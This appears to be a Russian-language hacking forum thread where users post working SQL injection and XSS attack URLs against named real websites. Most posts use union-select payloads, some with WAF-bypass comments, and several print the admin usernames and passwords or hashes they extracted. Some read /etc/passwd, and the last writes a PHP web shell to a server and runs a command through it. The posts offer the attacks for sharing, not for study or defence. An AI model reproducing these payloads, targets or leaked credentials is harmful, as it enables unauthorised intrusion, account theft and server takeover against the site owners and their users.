Обход WAF (Mod_Security) http://www.slightergolf.com/products/shop.php?c=misc&id=-8 /*!12345union*//*!12345select*/1,2,3,4,user(),6,7,8,9,10,11--+ USER():slighter_sgAdmin@localhos http://www.slightergolf.com/products/shop.php?c=misc&id=-8 /*!12345union*//*!12345select*/1,2,3,4,/*!CONVERT*/(/*!12345GrOuP_CoNcAT(name,0x3a,password)*/ USING latin1),6,7,8,9,10,11 /*!12345from*/ admins--+ Name:misty, slighter,sgadmin Password:svD1A0JC5ggN,C4XTZLtTlTUg,C4XTZLtTlTUg
SQL injec. Scott County CDA http://www.scottcda.org/page.php?id=-16 union select 1,group_concat(email,0x3a,password),3,4,5,6 from admin--+
SQL INJECTION Providing Turnkey Solutions To Automotive Industry http://www.nashgroup.co.in/about.php?catid=-5 union select 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9--+ nashgrou_user@localhost : nashgrou_dbnew : 5.5.52-cll http://www.nashgroup.co.in/about.php?catid=-5 union select 1,concat(username,0x3a,userpass),3,4,5,6,7,8,9 from tbladmin--+ orangedc:XCIJIlczVnYEIFAxAG8MPQ==
SQL INJECTION DRONES LAB https://www.drones-lab.com/blog/post.php?id=-24 union select 1,2,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),4,5,6,7,8,9--+&titre=Drones-lab-est-le-er-centre-de-formation-agree-par-lOSAC#.WJizCdKLTIX droneslab@localhost : droneslab_website : 10.1.18-MariaDB USER_PRIVILEGES:droneslab'@'localhost' -> NO
Firefox Code: http://top.zhyk.ru/search?rate=0%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E&chronic=0&filter=%D0%9F%D0%BE%D0%B4%D0%BE%D0%B1%D1%80%D0%B0%D1%82%D1%8C+%D1%81%D0%B5%D1%80%D0%B2%D0%B5%D1%80
Blind SQL injection agroharvest.ru/index.php?route=product/product&path=336_343&product_id=21448' AND substring(VERSION(),1,6)='5.6.32 В случае, когда равенство не выполняется, на сайте пропадают рекомендуемые товары. Данный параметр 17 раз напрямую попадает в код страницы - можно было бы сделать SiXSS. Но при попытке сразу после угловой скобки (<, >) весь остальной текст удаляется.
Тогда это не блайнд, если результат запроса выводится на станицу. А если сам параметр на странице то это уже не SiXSS а обычная отраженка. Но это просто термины. А так почёт и уважение.....
Увы, но ты не прав. На страницу попадают не результаты запроса. Ситуация такова, что если запрос корректен (любого вида), то на сайте есть рекомендации, противном случае они пропадают. Это и есть блайнд. Насчёт SiXSS - это когда твой запрос попадает сначала в SQL запрос, а потом отображается на сайте.И как один из результатов, например, юниона будет алерт.
Так это не противоречит тому, что я написал. Если ты выводишь алерт через параметр со страницы или через скулю....это немного разные вещи. Я только об этом.
www.ghanaconsulate.ae Db Version :5.1.73-community Db User : itscircle@localhost Port :3306 Check if Symlink is ON :YES Server Os Detected :Win32 http://www.ghanaconsulate.ae/about.php?id=-8 union select 1,group_concat(username,0x3a,password),3,4,5,6 from user--+ [email protected]:db38984fdc3d2fc992bdaaf12e64d976 db38984fdc3d2fc992bdaaf12e64d976:ITS@123
PHP: http://keralajobclub.com/candidate_profile.php?id==UlRJdXWYNGMWdlVxplRkh1VGplNZVFcrFWMkZ3UrRGVUNDaYVFMsFmVtJ1baZkWQ10V4ZUVwkDNiZFbJdVb4hWYwUjVVRlU0IlVKtEVq5EVTRlVGlVbstWYxoFeVpmSSJ2MCVnVxg2bTdkShRFbSZVZXh3cURlVWdlRkVzVVZlTUZkWWVFVKJkUspFRVxmUYZVV0kXWwg3bhFjU6NlaKNlVzIESXtmUTJWbGBHVtB3VNZVS5V1V1cUTx4UWjZkWsFWVwVEVYp1RNxWW410RxoVZtljRaZEcvJmRWNzUtFjTNZ1a5dFWrBTTHpEaaZkWOJ2MoZVWrlTYixGbKd1aatWYUZFWWhEZTJWVxYXZEpkWkZUW4lFbKNVTHlUMhJDeO5kVWllVzwmWSVVMNZFbWJVZqZkRVJTN3dlRjJzYHhHaUNTQ5lFVadXTWVFMRxmUYdFSBdXWyYUYWtGO4JGRGdVZIRGSWVkVLJVV180UsJ1Ul1GezRFVW50UGBXWSxmUrdVVwVFVtlzSNxmWXFlaORlVIFVeZFjSP10RGNDZEJkVNBjSFZVRWdVTX5EUiRkSrVmbkZUVtVzTNFjUVpVRoxGVrRzdaRUU41kRVpXYGhWVjdkUJpVV1MXTyEFMORlQS1kMoVnVGJ1aTdkVQJGRKtmTEZlVaRlTv1UMSVkWFhGbVVEN4pFRVhXTGVkeiZEaVZ1RSllWVVzcN1WUx0kVWxWTygXdWVkUrd1RWBFVqZ0aORlVWlFVONnYsFVMaZEasVVR0cnWEVVNNZUV6NmRoVlUHJVdaVVNP10VRJTTWZFaNNjQZZFRWtmYtZFUUpmQr5kaVdnVU50dixmU3p1R1wGVycneaRUW10kRFp3YE5UVWdkUJRVV18UTHJ1MNRkQW1EMKVlVIJ0aTVUMPJGROtGZ6F1dVRlTDFGbSVlUtRHa Есть ещё всяких много разных, если будет интерес буду выкладывать редко
интереснее то, как ты нашел уязвимость)), но все таки выкладывай, очень интересно увидеть разные случай.
Думал что- же такое. В итоге оказался пустяк. PHP: http://randyfath.com/international.php?id=-53 UnIon SeLEcT 0x3120616e642066616c7365202020756e696f6e2073656c65637420312c322c7573657228292c342c352c36,2,3,4,5,6 Просто не обычно
target: http://uzswlu.uz type: SQL Injection Code: http://uzswlu.uz/site/search?search=1" and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 --+
Sql-inject Code: http://dars.tj/topic.php?SECTION_ID=22'+UnIoN+SeLeCt+1,2,3,4,5,6,7,8,concat_ws(0x3a,LOGIN,PASSWORD),10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+c_user+--+&ID=35&UPPER_ID= admin:v0_S)B6j1a321ed955a9a82777afe79f9f74bc5d teacher:eRuzjWNCd8a62f807a2fe77ab7c3e065697c36d7
Несколько SQLi с чтением файла из файловой системы Code: http://immersionprograms.com/index.php/info/gallery?sid=956&catid=-1 union all select 1,2,3,load_file('/etc/passwd'),5,6,7,8,9&mcatid=806 Здесь вывод в title Code: view-source:http://www.eandkwood.com/category.php?c=1' union all select 1,2,3,load_file('/etc/passwd'),5,6,7 and '0'='0 Некий шоп с фармой Code: http://www.rxnature.com/category.html?cid=1' union all select 1,load_file('/etc/passwd'),3,4,5,6,7,8,9,10,11,12,13 and '0'='0
Запись минишела через SQLi и выполнение команд на сервере. Code: http://www.hamber.net/News_Detail.php?SN=-1 union all select 1,2,3,'<?php system($_GET[cmd]);?>',5,6,7 into outfile '/var/www/html/xux.php' --+ http://www.hamber.net/xux.php?cmd=ls -l